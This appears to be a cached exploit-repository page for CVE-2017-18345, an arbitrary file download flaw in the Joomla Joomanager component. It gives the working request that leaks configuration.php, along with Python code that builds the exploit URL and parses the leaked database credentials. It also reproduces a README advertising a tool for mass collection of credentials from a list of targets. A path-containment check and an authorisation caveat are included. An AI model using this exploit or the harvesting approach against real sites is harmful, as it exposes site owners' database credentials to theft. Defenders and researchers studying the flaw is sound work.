
CVE-2017-18345 PoC — Joomla! Joomanager Component Security Vulnerability

Source
Associated Vulnerability
Title: Joomla! Joomanager Component Security Vulnerability (CVE-2017-18345)
Description: Joomla! is an open-source content management system (CMS) developed by the Open Source Matters team in the United States; it provides RSS feeds, site search and other features. Joomanager is an advertisement module used with it. A security vulnerability exists in Joomla! Joomanager component versions 2.0.0 and earlier. An attacker can exploit it by sending the request index.php?option=com_joomanager&controller=details&task=download&path=configuration.php, which leaks the database credentials.
Description
The Joomanager component through 2.0.0 for Joomla! has an arbitrary file download issue: the `path` parameter of the `download` task is used to select the file that is served, so requesting `configuration.php` exposes the site's database credentials.
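The request above is the whole exploit, so the practical work is building it correctly, recognising a leaked `configuration.php` in the response, and knowing what check the download task is missing. The following is an added example (Python 3, not the repository's Python 2.7 PoC and not Joomanager's code): `build_poc_url` assembles the advisory's request for a given site, `parse_joomla_config` pulls the `JConfig` database fields out of a response body, and `is_safe_download_path` shows the generic containment check that an arbitrary-file-download bug of this kind lacks (an illustration of the defect class, not the vendor's actual fix). The `SAMPLE_RESPONSE` body is constructed to look like a Joomla `configuration.php`; the base URL `http://example.test` is a placeholder.

```python
"""Helpers for checking CVE-2017-18345 (Joomanager arbitrary file download).

Added example (Python 3); not the repository's Python 2 PoC.
"""
import os
import re
from urllib.parse import urlencode, urljoin

# Request from the advisory: path= is handed straight to the download task.
POC_PARAMS = {
    "option": "com_joomanager",
    "controller": "details",
    "task": "download",
    "path": "configuration.php",
}

# Joomla's configuration.php declares DB settings as public properties of
# class JConfig, e.g.:  public $user = 'dbuser';
_CONFIG_RE = re.compile(
    r"public\s+\$(host|user|password|db|dbprefix)\s*=\s*'([^']*)'\s*;"
)


def build_poc_url(base_url: str, path: str = "configuration.php") -> str:
    """Build the advisory's request URL for a Joomla site root (base_url)."""
    params = dict(POC_PARAMS, path=path)
    return urljoin(base_url.rstrip("/") + "/", "index.php") + "?" + urlencode(params)


def parse_joomla_config(body: str) -> dict:
    """Extract the JConfig database fields from a configuration.php body."""
    return {name: value for name, value in _CONFIG_RE.findall(body)}


def looks_like_joomla_config(body: str) -> bool:
    """True when a response carries the JConfig class with DB credentials,
    i.e. the download task served the file it should never serve."""
    creds = parse_joomla_config(body)
    return "class JConfig" in body and {"host", "user", "password", "db"} <= set(creds)


def is_safe_download_path(download_root: str, requested: str) -> bool:
    """Containment check a download handler needs (assumption: this is the
    kind of check missing in the vulnerable task). Resolves the requested
    name under the download root and rejects anything that escapes it,
    including absolute paths and '..' segments."""
    root = os.path.realpath(download_root)
    target = os.path.realpath(os.path.join(root, requested))
    return os.path.commonpath([root, target]) == root and target != root


# Constructed sample of what a leaked configuration.php looks like.
SAMPLE_RESPONSE = """<?php
class JConfig {
\tpublic $offline = '0';
\tpublic $sitename = 'Example Site';
\tpublic $dbtype = 'mysqli';
\tpublic $host = 'localhost';
\tpublic $user = 'joomla_user';
\tpublic $password = 's3cret';
\tpublic $db = 'joomla_db';
\tpublic $dbprefix = 'jos_';
}
"""

if __name__ == "__main__":
    print(build_poc_url("http://example.test"))
    print(parse_joomla_config(SAMPLE_RESPONSE))
    print(is_safe_download_path("/srv/joomla/downloads", "../configuration.php"))
```

Point a real HTTP client at the URL `build_poc_url` returns only against systems you are authorised to test; `looks_like_joomla_config` tells you whether the body that came back is the leaked configuration rather than a normal component page. The containment check uses `realpath` so that symlinks and `..` are resolved before comparison, which is why a string prefix test on the raw `path` value is not enough.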
Readme
[![Version](https://img.shields.io/badge/Joomla-com_joomanager_2.0-magenta.svg?maxAge=259200)]()
[![Engine](https://img.shields.io/badge/CVE-2017_18345-yellow.svg)]()
[![Stage](https://img.shields.io/badge/Release-Stable-brightgreen.svg)]()
[![Build](https://img.shields.io/badge/Version-Python2.7-green.svg)]()


# COM_JOOMANAGER 2.0 -ARBITRARY FILE DOWNLOAD

![alt tag](https://imgur.com/ZzJTlA8.jpg)

Mass collection of database credentials through the COM_JOOMANAGER component of the Joomla CMS. The project is written in Python 2.x; for more information, see the YouTube video.

*CVE:* `2017-18345`         *Risk*: `Security Risk High`

*0day.Today-ID:* `29950`         *ExploitDB-id:* `44252`

*0day db-id:* `16348`     *CXSecurity-id:* `WLB-2018030054`

**CVSS v3.0 Severity and Metrics:**
*Base Score:* `9.8 CRITICAL`

- https://vel.joomla.org/vel-blog/2020-joomanager-2-0-0-other
- https://www.cvedetails.com/cve/CVE-2017-18345/
- https://nvd.nist.gov/vuln/detail/CVE-2017-18345
- https://twitter.com/cvenew/status/1033829060588302337
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18345
- https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-18345.html
- https://launchpad.net/bugs/cve/CVE-2017-18345
- https://security-tracker.debian.org/tracker/CVE-2017-18345
- https://vuldb.com/?id.123260
- https://infosec.cert-pa.it/cve-2017-18345.html
- https://0day.today/exploit/29950
- https://www.exploit-db.com/exploits/44252
- https://cxsecurity.com/issue/WLB-2018030054
- https://www.exploitalert.com/view-details.html?id=29114
- https://www.phpsecure.info/go/162082.html
- https://hackertor.com/2017/08/31/joomla-component-joomanager-2-0-0-arbitrary-file-download/
- https://buzzreddit.com/post/82glkb
- https://www.exploit-database.net/?id=96963
- http://reader.centrodouniverso.com.br/archives/544371



![alt tag](http://imgur.com/HfQFiSy.jpg)
![alt tag](http://imgur.com/qLfUelc.jpg)
![alt tag](http://imgur.com/GUlGz6e.jpg)

**DEPENDENCIES**
- `BeautifulSoup`
- `threading`
- `urlparse`
- `urllib2`
- `argparse`
- `requests`
File Snapshot

```
[4.0K] /data/pocs/bc4916148cbf783d263fb94508f0a9113e74ef71
├── [1.4K] COM_JOOMANAGER_TARGETS.txt
├── [ 11K] CVE-2017-18345-com_joomanager.py
├── [ 34K] LICENSE
└── [2.0K] README.md

0 directories, 4 files
```
Shenlong Bot has cached this for you